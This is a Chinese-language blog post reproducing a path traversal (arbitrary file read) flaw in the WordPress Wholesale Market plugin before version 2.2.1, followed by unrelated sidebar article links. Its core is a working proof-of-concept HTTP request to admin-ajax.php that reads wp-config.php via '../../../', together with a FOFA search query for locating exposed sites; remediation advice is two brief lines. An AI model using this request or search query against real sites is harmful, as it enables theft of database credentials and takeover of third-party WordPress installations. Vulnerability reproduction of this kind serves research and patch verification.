WordPress Wholesale Market 插件 任意文件读取漏洞复现

  • 开发
  • 45

0x01 产品简介

WordPress plugin Wholesale Market 是一个woocommerce扩展插件,使您的商店能够创建批发用户,并通过设置产品的批发价格。

0x02 漏洞概述

WordPress plugin Wholesale Market 2.2.1之前版本存在路径遍历漏洞,该漏洞源于没有进行授权检查,也不会验证用户输入。攻击者利用该漏洞可以从服务器下载任意文件。

0x03 复现环境

FOFA:body="wp-content/plugins/wholesale-market"

0x04 漏洞复现

PoC

GET /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept-Encoding: gzip

读取wp-config.php配置文件

0x05 修复建议 

关闭互联网暴露面或接口设置访问权限

升级至安全版本

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-21 18:02:03       98 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-21 18:02:03       106 阅读

  9. 在Django里面运行非项目文件

    2024-03-21 18:02:03       87 阅读

  19. Python语言-面向对象

    2024-03-21 18:02:03       96 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-03-21 18:02:03       91 阅读

热门阅读

  3. 洛克王国卡小游戏1

    2024-03-21 18:02:03       44 阅读

  5. uniapp使用uview ui库的popup或者overlay解决它的底层内容滚动问题

    2024-03-21 18:02:03       43 阅读

  8. 工作需求iview 组件的使用

    2024-03-21 18:02:03       46 阅读

  9. Milvus笔记

    2024-03-21 18:02:03       36 阅读
  13. Web入门

    Web入门

    2024-03-21 18:02:03      38 阅读

  14. docker+k8s相关面试题

    2024-03-21 18:02:03       31 阅读

  15. 循环语句中var与let声明循环变量的区别

    2024-03-21 18:02:03       40 阅读

  17. 防抖节流插件throttle-debounce

    2024-03-21 18:02:03       46 阅读

  22. C++面试100问(十一)

    2024-03-21 18:02:03       40 阅读

  23. 【蓝桥杯】链式前向星

    2024-03-21 18:02:03       48 阅读

  24. python列表的创建、访问、切片和方法

    2024-03-21 18:02:03       48 阅读

  26. MySQL 管理用户授权 DCL

    2024-03-21 18:02:03       45 阅读

  28. PyTorch Dataset、DataLoader长度

    2024-03-21 18:02:03       43 阅读